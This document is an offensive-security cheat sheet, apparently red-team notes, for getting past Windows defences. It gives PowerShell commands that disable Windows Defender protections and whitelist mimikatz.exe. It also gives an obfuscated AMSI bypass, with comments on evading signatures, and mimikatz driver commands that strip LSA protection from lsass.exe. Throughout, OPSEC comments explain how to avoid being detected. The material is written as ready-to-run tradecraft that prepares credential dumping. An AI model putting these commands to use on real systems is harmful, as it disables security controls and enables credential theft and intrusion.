## Initial Setup & Bypasses
### PowerShell Setup
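# Run as Administrator
# Every Set-/Add-MpPreference call below needs an elevated token; this opens a NEW elevated ISE
# window — run the rest of the block there, not in the shell that launched it.
Start-Process PowerShell_ISE -Verb RunAs

# Disable Windows Defender
# Tamper Protection (on by default on current Windows 10/11 builds) silently rejects these
# preference changes: the cmdlets return without error but nothing is disabled. Check first,
# and verify afterwards instead of trusting the calls.
Get-MpComputerStatus | Select-Object IsTamperProtected, RealTimeProtectionEnabled, AMServiceEnabled
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionProcess "mimikatz.exe"
# Confirm the changes actually took effect (with Tamper Protection on, these stay unchanged)
Get-MpPreference | Select-Object DisableRealtimeMonitoring, DisableIOAVProtection, DisableIntrusionPreventionSystem, ExclusionPath, ExclusionProcess
# OPSEC: each change is recorded in Microsoft-Windows-Windows Defender/Operational
# (e.g. 5001 real-time protection disabled, 5007 configuration changed) and forwarded by MDE/EDR.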
### AMSI Bypass
# Method 1: Obfuscated
# Uses reflection to set the non-public static field amsiInitFailed on
# System.Management.Automation.AmsiUtils to $true, so this PowerShell process treats AMSI as
# failed-to-initialise and stops submitting content for scanning.
# Scope: current process only — other powershell.exe instances and non-PowerShell AMSI consumers
# are unaffected.
# The backtick splitting and -f format strings exist only to dodge static signatures on
# "AmsiUtils"/"amsiInitFailed"; Defender has signatured many variants of exactly this bypass, so
# expect it to be flagged on a patched host — test on a representative build first.
# Script Block Logging (Event ID 4104), if enabled, still records the command text as typed.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('Non'+'Publ'+'i'),'c','Stat','ic','ic|NonPubli' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
### LSA Protection Bypass
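# Check status
# Value meanings: 1 = LSA protection enabled with UEFI lock (cannot be undone by editing the
# registry), 2 = enabled without UEFI lock. A missing value only means it is not set here —
# Windows 11 (22H2+) may enable it by default on new installs, so verify rather than assume.
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
# Method 1: mimidrv
# Loads the signed mimidrv.sys kernel driver and clears the PPL flag on lsass.exe from kernel mode.
# Requirements/caveats: admin (SeLoadDriverPrivilege); HVCI/memory integrity blocks the driver, and
# mimidrv.sys is on Microsoft's vulnerable-driver blocklist, so this fails on hardened hosts.
# OPSEC: loading the driver installs a service (System 7045), is a driver-load event (Sysmon 6) and
# is detected by Defender — do not run this blind on a monitored target.
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
# Unload/remove the driver when done (the service-install event remains in the log regardless)
mimikatz # !-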